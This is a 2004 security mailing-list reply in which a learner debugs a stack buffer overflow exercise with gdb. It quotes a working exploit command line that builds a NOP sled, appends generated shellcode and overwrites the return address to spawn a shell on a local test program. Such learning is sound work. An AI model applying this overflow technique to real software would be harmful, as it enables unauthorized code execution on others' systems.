Re: Buffer Overflow problem

From: John Vill (kalookalaa_at_hotmail.com)
Date: 05/10/04

  • Next message: Simon Taplin: "Tips for Setting up VMWare Honeypot" 
    To: security-basics@securityfocus.com
Date: Mon, 10 May 2004 00:28:47 -0400

    Hello,

    Thanks for the reply, Krzysztof. My return address isnt incorrectly aligned
    as it is being put into the EIP the right way as I see it with the info
    registers in gdb. If I add or subtract a NOP or two "00" gets added to the
    beginning or end of the address. For example 0xfff94b00 or 0x00bffff9 where
    my address is 0xbffff94b. Or maybe it is the problem and Im just not
    understanding correctly?

    I used this exact method for overflowing a larger buffer (500 or so) and it
    works fine. I do not know why im getting Illegal Instruction. The address Im
    using is from:
           unsigned long sp(){ __asm__("movl %esp, %eax"); }
    I run that to get the addr and use that address. I havent tried other
    methods like the got, libc, or even dtors yet. I just have no clue why I'm
    getting "Illegal Instruction" when the EIP is being overwritten with the
    right address. I made sure to turn off all the stack protections and
    everything... Can anyone tell me what "Illegal Instruction" is exactly? This
    is frustrating =P

    >Program received signal SIGSEGV, Segmentation fault.
    >0x00bffff4 in ?? ()
    >
    >So I'm just one byte off from the correct location. Examining the stack
    >proves
    >that this is true:
    >
    >(gdb) x/4x $esp - 8
    >0xbffff5a8: 0xa068732f 0x00bffff4 0x00000002 0xbffff5f4
    >(gdb)
    >
    >The value 0xa06873f2 just before the return addr holds the missing part of
    >my
    >buffer's address. So all you have to do is move the entire address by one
    >byte. So...
    >
    >Starting program: /home/kg/prog/sec/buf `perl -e 'print
    >"\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'`
    >
    >sh-2.05b$
    >
    >.. it works.

    _________________________________________________________________
    Watch LIVE baseball games on your computer with MLB.TV, included with MSN
    Premium!
    http://join.msn.com/?page=features/mlb&pgmarket=en-us/go/onm00200439ave/direct/01/

    ---------------------------------------------------------------------------
    Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off
    any course! All of our class sizes are guaranteed to be 10 students or less
    to facilitate one-on-one interaction with one of our expert instructors.
    Attend a course taught by an expert instructor with years of in-the-field
    pen testing experience in our state of the art hacking lab. Master the skills
    of an Ethical Hacker to better assess the security of your organization.
    Visit us at:
    http://www.infosecinstitute.com/courses/ethical_hacking_training.html
    ----------------------------------------------------------------------------

  • Next message: Simon Taplin: "Tips for Setting up VMWare Honeypot"